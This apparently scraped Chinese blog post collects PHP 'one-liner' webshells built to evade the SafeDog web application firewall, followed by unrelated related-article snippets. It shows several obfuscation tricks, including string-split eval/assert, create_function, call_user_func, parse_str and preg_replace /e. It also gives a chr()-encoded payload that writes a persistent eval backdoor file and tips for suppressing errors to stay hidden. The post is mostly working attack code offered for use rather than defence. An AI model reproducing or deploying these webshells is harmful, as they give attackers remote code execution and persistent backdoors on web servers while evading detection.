过狗的一句话

news/2024/11/28 11:41:43/

php过狗一句话:

waf通常以关键字来判断是否是一句话木马。

 

<?php $test="e#v#a#l";$test1=explode("#",$test);$test2=$test1[0].$test1[1].$test1[2].$test1[3];$test2($_POST['zt']);
?>

这是eval函数的一句话的写法

<?php $test="a#s#s#e#r#t";$test1=explode("#",$test);$test2=$test1[0].$test1[1].$test1[2].$test1[3].$test1[4].$test1[5];$test2($_POST['zt']);
?>

 这是assert函数的一句话的写法

<?php 
$test =create_function('',$_POST['zt']);
$test();
?>
把用户传的数据生成一个test()函数,然后执行。

 

 

<?php 
@call_user_func(assert,$_POST['zt']);
?>
call_user_func这个函数可以调用其他函数,
<?php
$test='<?php $z=$_POST['zt']; eval($z); ?>';
file_put_contents("zt.php",$test);
?>
先生成一个zt.php的文件,再把$test的内容放进去;

 

<?php
$str="a=eval";
parse_str($str);
$a($_POST['a']);
?>

 parse_str()会把$str的字符串解析$a=eval的形式,例子:

<?php
parse_str("name=Bill&age=60");
echo $name."<br>";
echo $age;
?>

打印结果:

Bill
60

<?php
function fun()
{ return $_POST['zt'];}
@preg_replace("/test/e",fun(),"woshinibaba");
?>

使用/e修饰符,preg_replace会将 replacement 参数当作 PHP 代码执行,也就是把fun()当php代码执行。

如果输入一个参数

?zt=eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(100).chr(97).chr(116).chr(97).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))
密文对应的明文是:fputs(fopen(data/a.php,w),<?php eval($_POST[cmd])?>);
执行的结果是在/data/目录下生成一个一句话木马文件 a.php。

类似于下面这种过狗方式:

<?php 
$a=chr(101);
$b=chr(118);
$c=chr(97);
$d=chr(108);
$e="($_POST['zt']);";
echo ($a.$b.$c.$d.$e);
?>

注意使用一句话木马的时候可以在函数前加”@”符,这个符号让php语句不显错误信息,增加隐蔽性。


http://www.ppmy.cn/news/451520.html

相关文章

每日一犬 · 猴头梗

猴头梗 有着小猴子一样的表情 得到了德国女性的宠爱 它不光是一种宠物犬 还可以捕捉老鼠 猴头梗 身 高&#xff1a;25cm-30cm 体 重&#xff1a;3公斤-5公斤 寿 命: 14年-15年 习 性&#xff1a;活泼&#xff0c;警觉 喜 食&#xff1a;肉&#xff0c;杂食 用 途&am…

加密狗是什么呢?

前言 这个在我们单板的升级&#xff0c;或者电脑升级的时候&#xff0c;不知道你是否还有映像我们会插一个USB&#xff0c;无意之中听到了一个新的知识&#xff0c;加密狗。 加密利器——加密狗 1.0解释 加密狗是外形酷似U盘的一种硬件设备&#xff0c;正名加密锁&#xff0…

CentOS 安装 安全狗

​ 一、下载安全狗 法一、64位操作系统下载命令&#xff1a; wget http://down.safedog.cn/safedog_linux64.tar.gz32位操作系统下载命令&#xff1a; wget http://down.safedog.cn/safedog_linux32.tar.gz法二、官网下载后上传到服务器 服务器安全狗 https://www.safedog…

python爬虫教程:requests模块用法

requests 是 Python 中一个非常流行的第三方 HTTP 请求库&#xff0c;其提供了便捷的 HTTP 请求方式和丰富的高级功能。接下来&#xff0c;我将从基础使用、请求结构、请求方法、自定义请求头、请求参数、会话和 Session、代理、SSL 验证、文件上传、重定向等方面深入介绍 requ…

安装Apache mysql php

目录 一.Apache网站服务 Apache——》静态页面处理——》将静态处理交给PHP Apache简介 安装Apache服务 ​编辑 安装软件思路 二.安装mysql数据库 1. 安装依赖包 2.创建程序用户管理 3.加压安装包 这边就安装完成了​编辑 重点来了 报错了 没有空间 我最后的解决 方法…

数据安全最佳实践脱敏版本

随着信息社会的发展和互联网的兴起&#xff0c;数据已经成为了一种非常重要的资产&#xff0c;可以用于推动商业发展和提升工作效率。但同时&#xff0c;用于存储和传输数据的系统网络&#xff0c;却是攻击者的目标。为了保护企业数据的安全&#xff0c;需要围绕数据安全解决方…

网络安全如何从零基础到精通?

在看这篇文章之前&#xff0c;有个问题想确认一下&#xff0c;你现在自学网络安全是出于兴趣原因&#xff0c;还是说之后准备走网络安全这个方向&#xff1f; 因为目的不同&#xff0c;学习的方式和深度也会不一样。 今天我就围绕职业发展这个方向来和你聊聊。 如果你真的想通过…

多核处理器_手机处理器性能排行:骁龙865第四,麒麟9000第二,第一优势明显!...

阅读本文前&#xff0c;请您先点击上面的“蓝色字体”&#xff0c;再点击“关注”&#xff0c;这样您就可以继续免费收到最新文章了。每天都有分享。完全是免费订阅&#xff0c;请放心关注。感谢大家的阅读&#xff0c;喜欢小编为你精心编辑的文章吗&#xff1f;欢迎留言评论&a…